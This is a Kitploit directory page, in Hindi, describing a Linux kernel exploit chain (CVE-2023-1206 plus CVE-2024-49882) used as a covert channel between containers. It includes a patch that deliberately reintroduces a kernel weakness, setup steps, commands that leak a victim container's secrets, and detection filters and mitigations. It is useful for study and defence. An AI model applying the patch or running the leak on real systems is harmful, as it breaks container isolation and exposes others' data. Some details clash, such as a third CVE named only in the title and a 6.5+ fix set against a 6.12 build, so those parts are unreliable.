Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-1206-CVE-2025-40040-CVE-2024-49882 — सुरक्षित संचार ऐप बनाने के लिए 3 लिनक्स कर्नेल बग चेन जो साइड चैनल का उपयोग करके कुंजी स्थापित करती हैं और गुप्त चैनल स्थापित करती हैं; | Kitploit
उपकरण/GitHubGitHub/spiralbl0ck/cve-2023-1206-cve-2025-40040-cve-2024-49882
कंटेनर सुरक्षाशोषणडेटा निष्कासननेटवर्क सुरक्षाकंटेनर एस्केपबाइनरी शोषण
GitHubspiralbl0ck/cve-2023-1206-cve-2025-40040-cve-2024-49882

CVE-2023-1206-CVE-2025-40040-CVE-2024-49882

सुरक्षित संचार ऐप बनाने के लिए 3 लिनक्स कर्नेल बग चेन जो साइड चैनल का उपयोग करके कुंजी स्थापित करती हैं और गुप्त चैनल स्थापित करती हैं;

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1248 महीने पहलेअभी तक समीक्षित नहीं

संयुक्त गुप्त चैनल: CVE-2023-1206 + CVE-2024-49882

अवलोकन

यह प्रोजेक्ट दो लिनक्स कर्नेल कमजोरियों का उपयोग करके एक गुप्त संचार चैनल प्रदर्शित करता है:

घटकCVEउद्देश्य
सिंक चैनलCVE-2023-1206IPv6 हैश कोलिजन टाइमिंग के माध्यम से घड़ी सिंक्रनाइज़ेशन
डेटा चैनलCVE-2024-49882ह्यूपेज लीक के माध्यम से क्रॉस-कंटेनर डेटा स्थानांतरण
root@kitploit:~
┌─────────────────────────────────────────────────────────────────────┐
│                    गैर-एन्क्रिप्टेड गुप्त चैनल                     │
├─────────────────────────────────────────────────────────────────────┤
│  कंटेनर A (प्रेषक)              कंटेनर B (प्राप्तकर्ता)           │
│  ┌─────────────────┐               ┌─────────────────┐              │
│  │ 1. ह्यूपेज पर   │               │ 4. सिंक        │              │
│  │    डेटा लिखें   │               │    प्रस्तावना   │              │
│  └────────┬────────┘               │    का पता लगाएं│              │
│           │                        └────────┬────────┘              │
│           ▼                                 ▼                        │
│  ┌─────────────────┐   IPv6 हैश   ┌─────────────────┐              │
│  │ 2. सिंक         │──कोलिजन────▶│ 5. विलंबता     │              │
│  │    प्रस्तावना   │    टाइमिंग  │    मापें        │              │
│  │    भेजें        │              │                  │              │
│  └────────┬────────┘              └────────┬────────┘              │
│           │                                 │                        │
│           ▼                                 ▼                        │
│  ┌─────────────────┐   ह्यूपेज    ┌─────────────────┐              │
│  │ 3. ह्यूपेज     │──पुनः उपयोग─▶│ 6. लीक किया    │              │
│  │    जारी करें   │               │    गया डेटा    │              │
│  │                 │               │    कैप्चर करें  │              │
│  └─────────────────┘               └─────────────────┘              │
└─────────────────────────────────────────────────────────────────────┘

पूर्वापेक्षाएँ

1. कर्नेल सेटअप (CVE-2023-1206)

आपको कर्नेल 6.12 की आवश्यकता है जिसमें कमजोरी पुनः शामिल हो:

root@kitploit:~
# कर्नेल स्रोत क्लोन करें
cd ~
git clone --depth=1 --branch v6.12 https://github.com/torvalds/linux.git linux-6.12
cd linux-6.12

# कमजोरी पैच लागू करें
cat << 'EOF' > /tmp/vuln_patch.patch
--- a/include/net/ipv6.h
+++ b/include/net/ipv6.h
@@ -750,7 +750,12 @@ static inline u32 ipv6_addr_hash(const struct in6_addr *a)
 /* more secured version of ipv6_addr_hash() */
 static inline u32 __ipv6_addr_jhash(const struct in6_addr *a, const u32 initval)
 {
-	return jhash2((__force const u32 *)a->s6_addr32, 4, initval);
+	u32 v = (__force u32)a->s6_addr32[0] ^ (__force u32)a->s6_addr32[1];
+
+	return jhash_3words(v,
+			    (__force u32)a->s6_addr32[2],
+			    (__force u32)a->s6_addr32[3],
+			    initval);
 }
EOF

patch -p1 < /tmp/vuln_patch.patch

# बिल्ड और इंस्टॉल करें
cp /boot/config-$(uname -r) .config
make olddefconfig
make -j$(nproc)
sudo make modules_install
sudo make install
sudo update-grub

# कमजोर कर्नेल में रीबूट करें
sudo reboot

2. ह्यूपेज सेटअप (CVE-2024-49882)

root@kitploit:~
# ह्यूपेज आवंटित करें
echo 256 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages

# सत्यापित करें
cat /sys/kernel/mm/hugepages/hugepages-2048kB/free_hugepages

# udmabuf मॉड्यूल लोड करें
sudo modprobe udmabuf

# /dev/udmabuf मौजूद है सत्यापित करें
ls -la /dev/udmabuf

3. डॉकर सेटअप

root@kitploit:~
# IPv6 समर्थन के साथ डॉकर इंस्टॉल करें
sudo apt-get update
sudo apt-get install -y docker.io docker-compose

# डॉकर में IPv6 सक्षम करें
sudo cat > /etc/docker/daemon.json << 'EOF'
{
  "ipv6": true,
  "fixed-cidr-v6": "fd00::/80",
  "experimental": true,
  "ip6tables": true
}
EOF

sudo systemctl restart docker

त्वरित आरंभ

सब कुछ बनाएँ

root@kitploit:~
cd ~/covert_channel

# होस्ट पर बनाएँ
make

# डॉकर कंटेनर बनाएँ
docker-compose build

परीक्षण 1: CVE-2023-1206 सत्यापित करें (सिंक चैनल)

root@kitploit:~
# कोलिजन परीक्षण चलाएँ
./test_collision

# अपेक्षित आउटपुट:
# [VULNERABLE] सभी पते एक ही मान पर हैश करते हैं!
# [CRITICAL] सभी 1M पते एक बकेट में आ गए!

परीक्षण 2: क्रॉस-कंटेनर डेटा लीक (CVE-2024-49882)

root@kitploit:~
# टर्मिनल 1: पीड़ित डेटाबेस प्रारंभ करें
docker-compose up victim_db

# टर्मिनल 2: हमलावर चलाएँ
docker-compose run --rm attacker
# कंटेनर के अंदर:
cd /exploit
./exploit_debug

# टर्मिनल 3: लीक ट्रिगर करने के लिए पीड़ित को रोकें
docker stop victim_db

# लीक हुए रहस्यों के लिए टर्मिनल 2 देखें!

परीक्षण 3: पूर्ण गुप्त चैनल

root@kitploit:~
# टर्मिनल 1: प्राप्तकर्ता प्रारंभ करें
docker-compose run --rm receiver
cd /exploit
./covert_channel -r

# टर्मिनल 2: प्रेषक प्रारंभ करें
docker-compose run --rm sender
cd /exploit
./covert_channel -s "कंटेनर A से गुप्त संदेश"

# संदेश प्राप्त करने के लिए टर्मिनल 1 देखें!

वायरशार्क विश्लेषण

कैप्चर सेटअप

root@kitploit:~
# होस्ट पर, डॉकर ब्रिज ट्रैफिक कैप्चर करें
sudo tcpdump -i docker0 -w covert_channel.pcap

# या विशिष्ट नेटवर्क कैप्चर करें
sudo tcpdump -i br-$(docker network ls -q -f name=covert_net) -w covert.pcap

वायरशार्क फिल्टर

root@kitploit:~
# सिंक चैनल के लिए फिल्टर (IPv6 TCP SYN बाढ़)
ipv6 && tcp.flags.syn == 1 && tcp.flags.ack == 0

# विशिष्ट कोलिजन बकेट ट्रैफिक के लिए फिल्टर
ipv6.dst contains 20:01:0d:b8

# पोर्ट द्वारा फिल्टर
tcp.port == 31337

# केवल कनेक्शन प्रयास दिखाएं (कोई डेटा नहीं)
tcp.len == 0 && tcp.flags.syn == 1

# समय-आधारित विश्लेषण (प्रति सेकंड कनेक्शन)
# सांख्यिकी -> I/O ग्राफ़ -> Y अक्ष: पैकेट/सेकंड

क्या देखना है

  1. सिंक प्रस्तावना: SYN पैकेटों का वैकल्पिक विस्फोट

    • '1' बिट्स के दौरान उच्च पैकेट दर
    • '0' बिट्स के दौरान कम/कोई पैकेट नहीं
  2. समय पैटर्न:

    • ~100ms बिट अवधि
    • 1000+ कनेक्शनों का विस्फोट
  3. IPv6 पता पैटर्न:

    • सभी स्रोत पतों का XOR(addr[0], addr[1]) समान होगा
    • यह कोलिजन हस्ताक्षर है

वायरशार्क लुआ डिसेक्टर (वैकल्पिक)

~/.local/lib/wireshark/plugins/covert_channel.lua के रूप में सहेजें:

root@kitploit:~
-- CVE-2023-1206 के लिए गुप्त चैनल डिसेक्टर

local covert_proto = Proto("covert_sync", "CVE-2023-1206 गुप्त सिंक")

local f_collision = ProtoField.bool("covert.collision", "हैश कोलिजन")
local f_bucket = ProtoField.uint32("covert.bucket", "लक्ष्य बकेट", base.HEX)

covert_proto.fields = { f_collision, f_bucket }

function covert_proto.dissector(buffer, pinfo, tree)
    -- IPv6 TCP SYN की जाँच करें
    if pinfo.ipv6_src and pinfo.match_uint("tcp.flags", 0x02) then
        local src = pinfo.ipv6_src
        -- कोलिजन पैटर्न की जाँच करें
        local a0 = src:get_bytes(0, 4)
        local a1 = src:get_bytes(4, 4)
        -- XOR जाँच यहाँ होगी
        
        local subtree = tree:add(covert_proto, buffer())
        subtree:add(f_collision, true)
    end
end

-- TCP के लिए पंजीकृत करें
local tcp_table = DissectorTable.get("tcp.port")
tcp_table:add(31337, covert_proto)

tshark के साथ विज़ुअलाइज़ेशन

root@kitploit:~
# लाइव पैकेट दर ग्राफ़
tshark -i docker0 -f "tcp port 31337" -q -z io,stat,0.1

# प्लॉटिंग के लिए टाइमिंग डेटा निकालें
tshark -r covert.pcap -T fields -e frame.time_relative -e ipv6.src \
    -Y "tcp.flags.syn==1" > timing_data.csv

# gnuplot के साथ प्लॉट करें
gnuplot << 'EOF'
set terminal png size 1200,400
set output 'timing_channel.png'
set xlabel 'समय (सेकंड)'
set ylabel 'पैकेट'
set title 'CVE-2023-1206 गुप्त सिंक चैनल'
plot 'timing_data.csv' using 1:(1) smooth frequency with impulses
EOF

समस्या निवारण

कोई ह्यूपेज उपलब्ध नहीं

root@kitploit:~
# वर्तमान आवंटन की जाँच करें
cat /proc/meminfo | grep Huge

# आवंटन बढ़ाएँ
echo 512 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages

# यदि विफल हो, तो कैश ड्रॉप करने के बाद प्रयास करें
sync; echo 3 | sudo tee /proc/sys/vm/drop_caches
echo 512 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages

udmabuf उपलब्ध नहीं

root@kitploit:~
# मॉड्यूल लोड करें
sudo modprobe udmabuf

# यदि गायब है, तो कर्नेल कॉन्फिग में सक्षम करने की आवश्यकता हो सकती है
# CONFIG_UDMABUF=m

# यदि डिवाइस गायब है तो बनाएँ
sudo mknod /dev/udmabuf c 10 $(cat /proc/misc | grep udmabuf | cut -f1 -d' ')

डॉकर में IPv6 काम नहीं कर रहा

root@kitploit:~
# IPv6 फ़ॉरवर्डिंग सक्षम करें
sudo sysctl -w net.ipv6.conf.all.forwarding=1

# डॉकर नेटवर्क जाँचें
docker network inspect covert_net | grep -A5 IPv6

# IPv6 के साथ नेटवर्क पुनः बनाएँ
docker-compose down
docker network rm covert_channel_covert_net
docker-compose up

सिंक चैनल समय की समस्याएँ

root@kitploit:~
# अधिक विश्वसनीय पहचान के लिए बिट अवधि बढ़ाएँ
# covert_channel.c संपादित करें:
#define SYNC_BIT_DURATION_MS 200  # 100 से बढ़ाएँ

# यदि गलत सकारात्मक हों तो सीमा बढ़ाएँ
#define SYNC_THRESHOLD 3.0  # 2.0 से बढ़ाएँ

सुरक्षा निहितार्थ

यह कई गंभीर सुरक्षा मुद्दों को प्रदर्शित करता है:

  1. कंटेनर आइसोलेशन बायपास: ह्यूपेज पुनः उपयोग कंटेनरों के बीच डेटा लीक करता है
  2. गुप्त संचार: समय-आधारित चैनल नेटवर्क निगरानी को बायपास करते हैं
  3. एन्क्रिप्शन की आवश्यकता नहीं: चैनल स्वयं चुपके से काम करता है; एन्क्रिप्शन जोड़ने से यह अज्ञेय हो जाता है

शमन

  1. ह्यूपेज अक्षम करें: echo 0 > /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
  2. कर्नेल को पैच किए गए संस्करण में अपडेट करें (6.5+)
  3. डॉकर में --security-opt=no-new-privileges का उपयोग करें
  4. असामान्य TCP SYN पैटर्न की निगरानी करें

फ़ाइलें

संदर्भ

  • CVE-2023-1206: https://bugzilla.redhat.com/show_bug.cgi?id=2175903
  • CVE-2024-49882: लिनक्स कर्नेल ह्यूपेज कमजोरी
  • कर्नेल पैच: d11b0df7ddf1831f3e170972f43186dad520bfcc
टूल डाउनलोड करें
फ़ाइलविवरण
covert_channel.cसंयुक्त सिंक + डेटा चैनल
exploit_debug.cकेवल CVE-2024-49882 डेटा चैनल
test_collision.cCVE-2023-1206 सत्यापन
timing_channel.cसिंक चैनल प्रदर्शन
docker-compose.ymlकंटेनर सेटअप
Dockerfile.*कंटेनर बिल्ड फ़ाइलें